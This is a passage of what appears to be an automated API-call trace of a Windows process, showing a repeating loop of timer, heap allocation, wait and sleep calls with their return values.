returned 0x0 [0189.970] GetTickCount () returned 0x2180371 [0189.970] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0189.970] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.970] GetTickCount () returned 0x2180371 [0189.970] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3f0 [0189.970] GetTickCount () returned 0x2180371 [0189.970] GetTickCount () returned 0x2180371 [0189.970] GetTickCount () returned 0x2180371 [0189.970] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3f0 | out: hHeap=0x2150000) returned 1 [0189.970] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.970] GetTickCount () returned 0x2180371 [0189.970] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf8a0 [0189.970] GetTickCount () returned 0x2180371 [0189.970] GetTickCount () returned 0x2180371 [0189.971] GetTickCount () returned 0x2180371 [0189.971] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf8a0 | out: hHeap=0x2150000) returned 1 [0189.971] GetTickCount () returned 0x2180371 [0189.971] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3f0 [0189.971] GetTickCount () returned 0x2180371 [0189.971] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3f0 | out: hHeap=0x2150000) returned 1 [0189.971] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0189.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0190.045] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf510 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf510 | out: hHeap=0x2150000) returned 1 [0190.045] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acefd0 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acefd0 | out: hHeap=0x2150000) returned 1 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf5d0 [0190.045] GetTickCount () returned 0x2180c55 [0190.045] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf5d0 | out: hHeap=0x2150000) returned 1 [0190.045] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0190.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.094] GetTickCount () returned 0x218151a [0190.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0190.094] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.095] GetTickCount () returned 0x218151a [0190.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0190.095] GetTickCount () returned 0x218151a [0190.095] GetTickCount () returned 0x218151a [0190.095] GetTickCount () returned 0x218151a [0190.095] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0190.095] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.095] GetTickCount () returned 0x218151a [0190.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.095] GetTickCount () returned 0x218151a [0190.095] GetTickCount () returned 0x218151a [0190.095] GetTickCount () returned 0x218151a [0190.095] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.095] GetTickCount () returned 0x218151a [0190.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.095] GetTickCount () returned 0x218151a [0190.095] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.095] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0190.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.142] GetTickCount () returned 0x2181ddf [0190.142] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0190.142] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.142] GetTickCount () returned 0x2181ddf [0190.142] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0190.142] GetTickCount () returned 0x2181ddf [0190.143] GetTickCount () returned 0x2181ddf [0190.143] GetTickCount () returned 0x2181ddf [0190.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0190.143] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.143] GetTickCount () returned 0x2181ddf [0190.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.143] GetTickCount () returned 0x2181ddf [0190.143] GetTickCount () returned 0x2181ddf [0190.143] GetTickCount () returned 0x2181ddf [0190.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.143] GetTickCount () returned 0x2181ddf [0190.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0190.143] GetTickCount () returned 0x2181ddf [0190.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0190.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0190.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651b0 [0190.229] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0200 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad0200 | out: hHeap=0x2150000) returned 1 [0190.229] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfe10 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfe10 | out: hHeap=0x2150000) returned 1 [0190.229] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad06b0 [0190.229] GetTickCount () returned 0x21826d2 [0190.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad06b0 | out: hHeap=0x2150000) returned 1 [0190.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651b0 | out: hHeap=0x2150000) returned 1 [0190.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.313] GetTickCount () returned 0x2182fb7 [0190.313] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0190.313] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.313] GetTickCount () returned 0x2182fb7 [0190.313] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0aa0 [0190.313] GetTickCount () returned 0x2182fb7 [0190.313] GetTickCount () returned 0x2182fb7 [0190.313] GetTickCount () returned 0x2182fb7 [0190.313] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad0aa0 | out: hHeap=0x2150000) returned 1 [0190.313] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.313] GetTickCount () returned 0x2182fb7 [0190.313] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0aa0 [0190.313] GetTickCount () returned 0x2182fb7 [0190.313] GetTickCount () returned 0x2182fb7 [0190.314] GetTickCount () returned 0x2182fb7 [0190.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad0aa0 | out: hHeap=0x2150000) returned 1 [0190.314] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.314] GetTickCount () returned 0x2182fb7 [0190.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0aa0 [0190.314] GetTickCount () returned 0x2182fb7 [0190.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad0aa0 | out: hHeap=0x2150000) returned 1 [0190.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0190.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.387] GetTickCount () returned 0x218389b [0190.387] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0190.387] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.387] GetTickCount () returned 0x218389b [0190.388] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad23c0 [0190.388] GetTickCount () returned 0x218389b [0190.388] GetTickCount () returned 0x218389b [0190.388] GetTickCount () returned 0x218389b [0190.388] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad23c0 | out: hHeap=0x2150000) returned 1 [0190.388] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.388] GetTickCount () returned 0x218389b [0190.388] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2960 [0190.388] GetTickCount () returned 0x218389b [0190.388] GetTickCount () returned 0x218389b [0190.388] GetTickCount () returned 0x218389b [0190.388] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2960 | out: hHeap=0x2150000) returned 1 [0190.388] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.388] GetTickCount () returned 0x218389b [0190.388] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1fa0 [0190.388] GetTickCount () returned 0x218389b [0190.388] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad1fa0 | out: hHeap=0x2150000) returned 1 [0190.388] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0190.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.420] GetTickCount () returned 0x2184150 [0190.420] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0190.420] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.420] GetTickCount () returned 0x2184150 [0190.420] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.420] GetTickCount () returned 0x2184150 [0190.421] GetTickCount () returned 0x2184150 [0190.421] GetTickCount () returned 0x2184150 [0190.421] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.421] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.421] GetTickCount () returned 0x2184150 [0190.421] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.421] GetTickCount () returned 0x2184150 [0190.421] GetTickCount () returned 0x2184150 [0190.421] GetTickCount () returned 0x2184150 [0190.421] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.421] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.421] GetTickCount () returned 0x2184150 [0190.421] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.421] GetTickCount () returned 0x2184150 [0190.421] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.421] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0190.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0190.424] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2690 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2690 | out: hHeap=0x2150000) returned 1 [0190.424] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.424] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.424] GetTickCount () returned 0x21849e6 [0190.424] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.424] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0190.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.428] GetTickCount () returned 0x218527c [0190.428] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0190.428] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.428] GetTickCount () returned 0x218527c [0190.428] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2090 [0190.428] GetTickCount () returned 0x218527c [0190.428] GetTickCount () returned 0x218527c [0190.428] GetTickCount () returned 0x218527c [0190.428] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2090 | out: hHeap=0x2150000) returned 1 [0190.428] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.428] GetTickCount () returned 0x218527c [0190.428] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a50 [0190.428] GetTickCount () returned 0x218527c [0190.428] GetTickCount () returned 0x218527c [0190.428] GetTickCount () returned 0x218527c [0190.428] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a50 | out: hHeap=0x2150000) returned 1 [0190.428] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.428] GetTickCount () returned 0x218527c [0190.428] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.428] GetTickCount () returned 0x218527c [0190.428] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.429] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0190.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.431] GetTickCount () returned 0x2185b22 [0190.431] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0190.431] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.431] GetTickCount () returned 0x2185b22 [0190.431] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2780 [0190.431] GetTickCount () returned 0x2185b22 [0190.431] GetTickCount () returned 0x2185b22 [0190.432] GetTickCount () returned 0x2185b22 [0190.432] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2780 | out: hHeap=0x2150000) returned 1 [0190.432] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.432] GetTickCount () returned 0x2185b22 [0190.432] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2b40 [0190.432] GetTickCount () returned 0x2185b22 [0190.432] GetTickCount () returned 0x2185b22 [0190.432] GetTickCount () returned 0x2185b22 [0190.432] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2b40 | out: hHeap=0x2150000) returned 1 [0190.432] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.432] GetTickCount () returned 0x2185b22 [0190.432] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.432] GetTickCount () returned 0x2185b22 [0190.432] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.432] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0190.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0190.435] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.435] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2750 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2750 | out: hHeap=0x2150000) returned 1 [0190.435] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1fd0 [0190.435] GetTickCount () returned 0x21863b8 [0190.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad1fd0 | out: hHeap=0x2150000) returned 1 [0190.435] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0190.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.438] GetTickCount () returned 0x2186c4e [0190.438] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0190.438] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.438] GetTickCount () returned 0x2186c4e [0190.438] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.438] GetTickCount () returned 0x2186c4e [0190.438] GetTickCount () returned 0x2186c4e [0190.439] GetTickCount () returned 0x2186c4e [0190.439] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.439] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.439] GetTickCount () returned 0x2186c4e [0190.439] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.439] GetTickCount () returned 0x2186c4e [0190.439] GetTickCount () returned 0x2186c4e [0190.439] GetTickCount () returned 0x2186c4e [0190.439] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.439] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.439] GetTickCount () returned 0x2186c4e [0190.439] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.439] GetTickCount () returned 0x2186c4e [0190.439] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.439] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0190.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.446] GetTickCount () returned 0x21874f3 [0190.446] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0190.446] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.446] GetTickCount () returned 0x21874f3 [0190.446] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2a20 [0190.446] GetTickCount () returned 0x21874f3 [0190.446] GetTickCount () returned 0x21874f3 [0190.447] GetTickCount () returned 0x21874f3 [0190.447] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2a20 | out: hHeap=0x2150000) returned 1 [0190.447] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.447] GetTickCount () returned 0x21874f3 [0190.447] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad27e0 [0190.447] GetTickCount () returned 0x21874f3 [0190.447] GetTickCount () returned 0x21874f3 [0190.447] GetTickCount () returned 0x21874f3 [0190.447] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad27e0 | out: hHeap=0x2150000) returned 1 [0190.447] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.447] GetTickCount () returned 0x21874f3 [0190.447] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2060 [0190.447] GetTickCount () returned 0x21874f3 [0190.447] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2060 | out: hHeap=0x2150000) returned 1 [0190.447] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0190.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0190.450] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.450] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2780 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2780 | out: hHeap=0x2150000) returned 1 [0190.450] WaitForSingleObject (hHandle=0x72c, dwMilliseconds=0x0) returned 0x0 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad2ab0 [0190.450] GetTickCount () returned 0x2187d89 [0190.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad2ab0 | out: hHeap=0x2150000) returned 1 [0190.450] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0190.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0190.453] GetTickCount () returned 0x218861f [0190.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0190.453] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0190.453] GetTickCount () returned 0x218861f [0190.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad24e0 [0190.453] GetTickCount () returned 0x218861f [0190.453] GetTickCount () returned 0x218861f [0190.453] GetTickCount () returned 0x218861f [0190.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad24e0 | out: hHeap=0x2150000) returned 1 [0190.454] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0190.454] GetTickCount () returned 0x218861f [0190.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1fd0 [0190.454] GetTickCount () returned 0x218861f [0190.454] GetTickCount () returned 0x218861f [0190.454] GetTickCount () returned 0x218861f [0190.454] HeapFree (in: 